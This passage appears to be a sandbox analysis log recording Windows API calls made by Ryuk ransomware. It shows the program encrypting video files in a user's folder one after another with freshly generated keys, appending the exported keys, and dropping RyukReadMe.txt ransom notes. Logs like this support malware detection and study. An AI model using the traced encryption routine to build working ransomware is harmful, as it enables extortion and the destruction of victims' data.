HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\0Q_x5IE_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\0q_x5ie_.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.675] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=89078) returned 1 [0158.675] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=89078) returned 1 [0158.675] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x15ad4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.675] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.675] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.675] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.675] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.676] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.676] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x15bf6, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x15bf6, lpOverlapped=0x0) returned 1 [0158.677] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.677] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x15bf6, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x15c00) returned 1 [0158.677] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.677] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15c00, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x15c00, lpOverlapped=0x0) returned 1 [0158.678] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.678] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.678] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.678] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.678] CloseHandle (hObject=0x190) returned 1 [0158.702] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.706] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.706] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.707] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.707] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.707] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\8JuUaYM.flv", dwFileAttributes=0x80) returned 1 [0158.707] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\8JuUaYM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\8juuaym.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.707] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=100360) returned 1 [0158.707] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=100360) returned 1 [0158.707] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x186e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.707] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.708] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.708] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.708] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.708] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.708] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18808, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x18808, lpOverlapped=0x0) returned 1 [0158.710] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.710] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x18808, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x18810) returned 1 [0158.710] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.710] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18810, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x18810, lpOverlapped=0x0) returned 1 [0158.711] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.711] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.711] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.711] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.711] CloseHandle (hObject=0x190) returned 1 [0158.726] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.731] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.731] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.731] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.731] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.731] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\E0Hmy.mkv", dwFileAttributes=0x80) returned 1 [0158.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\E0Hmy.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\e0hmy.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.732] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=38456) returned 1 [0158.732] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=38456) returned 1 [0158.732] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x9516, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.732] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.733] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.733] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.733] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.733] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.733] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x9638, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x9638, lpOverlapped=0x0) returned 1 [0158.734] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.734] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x9638, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x9640) returned 1 [0158.734] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.734] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x9640, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x9640, lpOverlapped=0x0) returned 1 [0158.735] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.735] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.735] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.735] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.735] CloseHandle (hObject=0x190) returned 1 [0158.754] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.759] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.759] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.759] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.759] SetLastError (dwErrCode=0x0) [0158.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.759] GetLastError () returned 0x0 [0158.759] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0158.760] CloseHandle (hObject=0x190) returned 1 [0158.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0158.760] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0158.760] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0158.760] SetLastError (dwErrCode=0x0) [0158.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0158.761] GetLastError () returned 0x0 [0158.761] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0158.762] CloseHandle (hObject=0xe4) returned 1 [0158.762] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0158.762] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0158.762] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0158.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.762] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\9q2vm1dseTyA.avi", dwFileAttributes=0x80) returned 1 [0158.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\9q2vm1dseTyA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\0pve7\\9q2vm1dsetya.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0158.763] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=55794) returned 1 [0158.763] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=55794) returned 1 [0158.763] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xd8d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.763] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0158.764] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.764] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0158.764] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.764] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.764] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd9f2, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xd9f2, lpOverlapped=0x0) returned 1 [0158.765] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0158.765] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xd9f2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xda00) returned 1 [0158.766] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.766] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xda00, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xda00, lpOverlapped=0x0) returned 1 [0158.766] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0158.766] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.766] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.766] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0158.766] CloseHandle (hObject=0xd4) returned 1 [0158.785] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.789] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.789] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.790] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0158.790] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.790] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\Ij3cuVb4cnztpswy.mp4", dwFileAttributes=0x80) returned 1 [0158.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\Ij3cuVb4cnztpswy.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\r6x_zgdskqzo jlki0\\llmtd0\\0pve7\\ij3cuvb4cnztpswy.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0158.791] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=8661) returned 1 [0158.791] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=8661) returned 1 [0158.791] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x20b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.791] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0158.791] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.791] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0158.791] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.792] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.792] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x21d5, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x21d5, lpOverlapped=0x0) returned 1 [0158.792] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0158.792] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x21d5, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x21e0) returned 1 [0158.792] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.792] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x21e0, lpOverlapped=0x0) returned 1 [0158.792] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0158.792] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.792] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0158.792] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0158.793] CloseHandle (hObject=0xd4) returned 1 [0158.811] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.816] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.816] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.817] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0158.817] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.817] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\MFRRzBGlZhJAerS.flv", dwFileAttributes=0x80) returned 1 [0158.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\LLmtd0\\0Pve7\\MFRRzBGlZhJAerS.flv" (normalized: "c:\\users\\5p5nrgjn0js 